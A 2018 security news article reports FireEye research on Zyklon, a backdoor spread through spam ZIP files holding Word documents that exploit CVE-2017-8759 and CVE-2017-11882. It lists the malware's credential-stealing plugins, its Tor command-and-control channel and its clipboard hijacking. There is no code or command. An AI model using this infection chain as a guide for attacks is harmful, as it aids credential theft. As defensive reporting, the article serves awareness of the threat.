Story image

Zyklon HTTP malware creates gaping backdoors through MS Office exploits

22 Jan 18

Telecommunications, insurance and financial service providers are the latest targets of a multi-feature backdoor malware called Zyklon, which can conduct a number of different attacks from DDoS to keylogging.

Researchers Swapnil Patil and Yogesh Londhe from FireEye explain that while Zyklon has been in the wild in 2016, the recent wave is attaching to spam emails to deliver its malware.

Zyklon HTTP malware is described as a publicly-available and fully featured backdoor that is able to conduct DDoS attacks, steal passwords, act as a keylogger, update and remove itself; and acts as a downloader for additional plugins.

The malware can range from $75-$125 on underground marketplaces.

The latest wave arrives as a spam .ZIP attachment. That attachment contains a malicious .DOC file.

“The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over,” Researchers explain.

They go on to say that PowerShell is able to download the final payment from the Command & Control centre to execute the malware.

The malware uses two specific vulnerabilities to infect machines: The first vulnerability CVE-2017-8759 enables an attacker to use a malicious document for remote code execution.

The second vulnerability CVE-2017-11882 is a recently-discovered vulnerability that takes advantage of various versions of Microsoft Office 2016, 2013, 2010 and 2007.

It uses ‘Microsoft Office Memory Corruption Vulnerability’ and allows an attacker to run code in memory.

Researchers also say that Zyklon uses the Tor network as its Command and Control communication.

Researchers say that Zyklon can download additional plugins that include:

Browser Password Recovery, which can recover passwords from popular web browsers including Google Chrome, Mozille Firefox, Apple Safari, Internet Explorer, Comodo Dragon Browser, Opera Browser, Chrome Canary/SXS, CoolNovo Broswser, Flock Browser, SeaMonkey Browser and SRWare Iron Browser.

FTP Password Recovery, which can steal passwords from FTP applications including FileZilla, Dreamweaver, SmartFTP, FlashFXP, FTPCommander and WS_FTP.

Gaming Software Key Recovery, which steals keys from games including Age of Empires, FIFA, Call of Duty, NFS, The Sims, Quake, Half-Live, IGI and Star Wars.

Email Password Recovery, which can steal passwords from Microsoft Outlook and Microsoft Outlook Express, Mozilla Thunderbird, Windows Live Mail 2012, Incredimail, Foxmail, Windows Live Messenger, MSN Messenger, Windows Credential Manager, Google Talk, Gmail Notifier, PaltalkScene IM, Pidgin Messenger and Miranda Messenger.

Licence Key Recovery, which steals serial keys from popular software including Adobe, Microsoft Office, SQL Server and Nero.

Socks5 Proxy, which can create a reverse Socks5 proxy server.

The Zyklon malware can also hijack a user’s clipboard and can replaces a user’s copied Bitcoin address with one from the Zyklon control server.

How to configure your firewall for maximum effectiveness
ManageEngine offers some firewall best practices that can help security admins handle the conundrum of speed vs security.
Exclusive: Why botnets will swarm IoT devices
“What if these nodes were able to make autonomous decisions with minimal supervision, use their collective intelligence to solve problems?”
Why you should leverage a next-gen firewall platform
Through full lifecycle-based threat detection and prevention, organisations are able to manage the entire threat lifecycle without adding additional solutions.
The quid pro quo in the IoT age
Consumer consciousness around data privacy, security and stewardship has increased tenfold in recent years, forcing businesses to make customer privacy a business imperative.
ForeScout acquires OT security company SecurityMatters for US$113mil
Recent cyberattacks, such as WannaCry, NotPetya and Triton, demonstrated how vulnerable OT networks can result in significant business disruption and financial loss.
Exclusive: Fileless malware driving uptake of behavioural analytics
Fileless malware often finds its way into organisations via web browsers (or in combination with other vectors such as infected USB drives).
'DerpTrolling’ faces jail time for Sony DoS attacks
A United States federal court has charged a 23-year-old man for the hacks on Sony Online Entertainment and other major companies back in 2014.
It's time to rethink your back-up and recovery strategy
"It is becoming apparent that legacy approaches to backup and recovery may no longer be sufficient for most organisations."